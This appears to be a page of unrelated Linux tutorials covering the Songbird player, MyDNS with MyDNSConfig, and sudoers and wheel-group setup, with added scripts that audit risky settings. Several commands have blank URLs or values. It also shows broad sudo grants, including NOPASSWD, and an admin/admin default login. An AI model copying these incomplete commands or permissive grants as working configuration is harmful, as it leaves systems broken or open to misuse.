# rpm -ivh songbird-1.0.0-1.fc9.i386.rpm

Ubuntu Linux (.deb)
Ubuntu Intrepid 32 bits -  1.0.0
Ubuntu Intrepid 64 bits - 1.0.0  

Right-click the downloaded .tar.gz file after you downloaded it from and extract it.

Double-click the file called “songbird” in the newly created folder.

The first time you’ll have to agree to some EULA, it will ask you if you want to scan your pc for music files. It will also suggest some recommended add-ons.

 you move that folder to your home directory and add a launcher for it in your “application -> sound and video” menu.

Go to “system -> preferences -> main menu”, and create a new entry in the sound and video menu. In the command box simply link to the songbird file. If you have the songbird folder in your home directory that would be /home/yourusernamehere/Songbird/songbird. 

Here are some key features of "SongBird":
Play Anything:
· MP3, AAC, OGG, FLAC, WMA, and more. Can you teach Songbird to sing?

Pick Feathers:
· Choose from the two included themes: Rubberducky or Dove. You can even make one yourself.

Control the Flow:
· Play, Pause, Previous, Next, Volume, Mute, Seek, Three Repeat Modes, and Shuffle.

· Quickly switch between tasks using the buttons to the right of the dashboard display.

Organize Your Library:
· Filter your collection by Genre, Artist, Album, and Song or Search-As-You-Type.

Scan Your Computer for Music:
· Songbird will find your music and add it to your collection for you.

Super Slim Mini-Mode:
· Use the mini-mode for basic controls while keeping Songbird out of the way.

Multi-Language Support:
· Songbird comes in 39 languages. Be a localizer and see Songbird in your language!

Build Custom Mixes:
· Drag-and-drop songs from the Library or another playlist to create your own custom mixes.

Make Smart Mixes:
· Criteria-based playlists that are always up-to-date with your current collection.

Dynamic Mixes:
· Get mixes from the Internet and stay up-to-date with the latest updates, downloads, and casts.

Play In Place:
· Songbird plays MP3s without leaving the page.

Play the Web:
· Play web pages as playlists and view any web page as a playlist.

Set Music Watch Folders:
· Tell Songbird to watch a folder for new music and it will automatically add new tracks to your collection

· We now use GStreamer as our main media playback system, across all platforms - giving us higher performance, better reliability, and a platform for much more media-related functionality in the future.

Improved Album Art Support:
· The album artwork feature now supports drag and drop of images, as well as, toggling between Now Playing and Currently Selected tracks.

MyDNS + MyDNSConfig installation and configuration

MyDNS is a free DNS server for UNIX. It was implemented from scratch and is designed to serve records directly from an SQL database (currently either MySQL or PostgreSQL).

Its primary objectives are stability, security, interoperability, and speed, though not necessarily in that order. MyDNS does not include recursive name service, nor a resolver library. It is primarily designed for organizations with many zones and/or resource records who desire the ability to perform real-time dynamic updates on their DNS data via MySQL.

MyDNS starts and is ready to answer questions immediately, no matter how much DNS data you have in the database. It supports a few frills, including round robin DNS, dynamic load balancing, and outgoing AXFR for non-MyDNS nameservers and is licensed under the GNU General Public License.

First make sure you have a working setup of Apache and MySQL.

Download MyDNSConfig:
# wget
# tar xvfz MyDNSConfig-1.1.0.tar.gz
# cd MyDNSConfig-1.1.0
# mkdir /srv/www/htdocs/mydnsconfig
# cp -rf interface/* /srv/www/htdocs/mydnsconfig

Above "/srv/www/htdocs/" is my web directory

MySQL database setup:
# mysql -u root -p

> GRANT SELECT, INSERT, UPDATE, DELETE ON mydns.* TO 'mydns'@'localhost' IDENTIFIED BY 'mydnspassword';
> GRANT SELECT, INSERT, UPDATE, DELETE ON mydns.* TO 'mydns'@'localhost.localdomain' IDENTIFIED BY 'mydnspassword';
> quit;

Replace the word mydnspassword in the above commands with a password of your choice.

Install the MyDNSConfig MySQL Database:

# mysql -u root -p mydns < MyDNSConfig-1.1.0/install/mydnsconfig.sql

Edit the MyDNSConfig configuration; please make sure you fill in the correct database settings:
# vi /srv/www/htdocs/mydnsconfig/lib/

$conf["db_type"]        = 'mysql';
$conf["db_host"]        = 'localhost';
$conf["db_database"]        = 'mydns';
$conf["db_user"]        = 'mydns';
$conf["db_password"]        = 'mydnspassword';

Installing MyDNS
# wget
# rpm -ivh mydns-mysql-1.1.0-1.i386.rpm

Open the MyDNS configuration file /etc/mydns.conf, fill in the correct database details, allow zone transfers by setting allow-axfr to yes, enable TCP (allow-tcp = yes), and specify a recursive resolver (i.e., a valid nameserver, e.g. from your ISP; e.g. recursive = ) so that MyDNS can answer queries for domains that it isn't authoritative for:

# vi /etc/mydns.conf

Finally start the mydns server
# /etc/init.d/mydns start

To log in to the MyDNSConfig interface, open a web browser and enter the following URL:


Replace with the IP address of your server.

The default username and password of MyDNSConfig are:

Username: admin
Password: admin
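
A quick review of the /etc/mydns.conf settings changed in the steps above, as an added example that is not part of the original post or of MyDNS. The function name, the sample file and the db-* key names (taken to match the stock mydns.conf) are assumptions.

```shell
#!/bin/sh
# Added example: review the mydns.conf settings this post changes.
# Reads "key = value" lines on stdin; "#" starts a comment.
check_mydns_conf() {
    awk '
    function trim(s) { gsub(/^[ \t]+|[ \t]+$/, "", s); return s }
    {
        sub(/#.*/, "")                          # strip comments
        eq = index($0, "=")
        if (eq == 0) next
        conf[trim(substr($0, 1, eq - 1))] = trim(substr($0, eq + 1))
    }
    END {
        # The GRANT example above uses this password as a placeholder.
        if (conf["db-password"] == "mydnspassword") {
            print "db-password: still the placeholder from the GRANT example"
        }
        # Zone transfers run over TCP, so the two options must agree.
        if (conf["allow-axfr"] == "yes" && conf["allow-tcp"] != "yes") {
            print "allow-axfr: enabled, but zone transfers need allow-tcp = yes"
        } else if (conf["allow-axfr"] == "yes") {
            print "allow-axfr: zone transfers are enabled; limit TCP/53 to your secondary nameservers"
        }
        if (conf["recursive"] == "") {
            print "recursive: unset, non-authoritative names will not be resolved"
        }
    }'
}

# Constructed sample configuration (not taken from a real server).
sample_mydns_conf() {
    cat <<'EOF'
db-host = localhost          # constructed sample
db-user = mydns
db-password = mydnspassword
database = mydns
allow-axfr = yes
allow-tcp = no
recursive =
EOF
}

sample_mydns_conf | check_mydns_conf
```

On a live system, feed it the real file with `check_mydns_conf < /etc/mydns.conf`.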

Configuring sudo and adding users to Wheel group

If a server needs to be administered by a number of people it is normally not a good idea for them all to use the root account. This is because it becomes difficult to determine exactly who did what, when and where if everyone logs in with the same credentials. The sudo utility was designed to overcome this difficulty.

With sudo (which stands for "superuser do"), you can delegate a limited set of administrative responsibilities to other users, who are strictly limited to the commands you allow them. sudo creates a thorough audit trail, so everything users do gets logged; if users somehow manage to do something they shouldn't have, you'll be able to detect it and apply the needed fixes. You can even configure sudo centrally, so its permissions apply to several hosts.

The privileged command you want to run must first begin with the word sudo followed by the command's regular syntax. When running the command with the sudo prefix, you will be prompted for your regular password before it is executed. You may run other privileged commands using sudo within a five-minute period without being re-prompted for a password. All commands run as sudo are logged in the log file /var/log/messages.

The sudo configuration file is /etc/sudoers. We should never edit this file manually. Instead, use the visudo command:  # visudo

This protects from conflicts (when two admins edit this file at the same time) and guarantees that the right syntax is used (the permission bits are correct). The program uses Vi text editor.

All Access to Specific Users
You can grant users user1 and user2 full access to all privileged commands with this sudoers entry.
user1, user2  ALL=(ALL) ALL
This is generally not a good idea because this allows user1 and user2 to use the su command to grant themselves permanent root privileges thereby bypassing the command logging features of sudo.

Access To Specific Users To Specific Files
This entry allows user1 and all the members of the group operator to gain access to all the program files in the /sbin and /usr/sbin directories, plus the privilege of running the command /usr/apps/
user1, %operator ALL= /sbin/, /usr/sbin/, /usr/apps/

Access to Specific Files as Another User
user1 ALL=(accounts) /bin/kill, /usr/bin/kill, /usr/bin/pkill

Access Without Needing Passwords
This example allows all users in the group operator to execute all the commands in the /sbin directory without the need for entering a password.
%operator ALL= NOPASSWD: /sbin/

Adding users to the wheel group
The wheel group is a legacy from UNIX. When a server had to be maintained at a higher level than the day-to-day system administrator, root rights were often required. The 'wheel' group was used to create a pool of user accounts that were allowed to get that level of access to the server. If you weren't in the 'wheel' group, you were denied access to root.

Edit the configuration file (/etc/sudoers) with visudo and change these lines:
# Uncomment to allow people in group wheel to run all commands
# %wheel ALL=(ALL) ALL

To this (as recommended):

# Uncomment to allow people in group wheel to run all commands
%wheel ALL=(ALL) ALL

This will allow anyone in the wheel group to execute commands using sudo (rather than having to add each person one by one).

Finally, use the following command to add a user (e.g. user1) to the wheel group. The -a option appends the group, so the user's existing supplementary groups are kept:
# usermod -aG wheel user1
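
A check for the broad grants shown in the sudoers entries above (all commands, NOPASSWD, whole directories), as an added example that is not part of the original post or of sudo. The function names and the sample rules are assumptions; the sample is built from the entries on this page.

```shell
#!/bin/sh
# Added example: flag the broad sudoers grants discussed above.
# Reads sudoers-style rules on stdin (one rule per line, no "\" continuations)
# and prints one finding per risky grant.
audit_sudoers() {
    awk '
    function trim(s) { gsub(/^[ \t]+|[ \t]+$/, "", s); return s }
    /^[ \t]*(#|$)/ { next }                        # comments, blank lines
    /^[ \t]*(Defaults|[A-Za-z]+_Alias)/ { next }   # settings and aliases
    {
        eq = index($0, "=")
        if (eq == 0) next
        who  = substr($0, 1, eq - 1)
        cmds = substr($0, eq + 1)
        sub(/[ \t]+[^ \t]+[ \t]*$/, "", who)       # drop the host field
        who = trim(who)
        sub(/^[ \t]*\([^)]*\)/, "", cmds)          # drop the (runas) spec
        nopass = (cmds ~ /NOPASSWD:/)
        gsub(/[A-Z_]+:[ \t]*/, "", cmds)           # drop tags such as NOPASSWD:
        cmds = trim(cmds)
        if (nopass) {
            printf "NOPASSWD who=[%s] cmd=[%s]\n", who, cmds
        }
        n = split(cmds, c, ",")
        for (i = 1; i <= n; i++) {
            item = trim(c[i])
            if (item == "ALL") {
                printf "ALL-COMMANDS who=[%s] cmd=[%s]\n", who, item
            } else if (item ~ /\/$/) {
                printf "WHOLE-DIRECTORY who=[%s] cmd=[%s]\n", who, item
            }
        }
    }'
}

# Constructed sample built from the entries on this page.
sample_sudoers() {
    cat <<'EOF'
# %wheel ALL=(ALL) ALL
user1, user2  ALL=(ALL) ALL
user1 ALL=(accounts) /bin/kill, /usr/bin/kill, /usr/bin/pkill
%operator ALL= NOPASSWD: /sbin/
%wheel ALL=(ALL) ALL
EOF
}

sample_sudoers | audit_sudoers
```

The rule that lists individual kill commands produces no finding, which is the shape the narrower entries above aim for.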
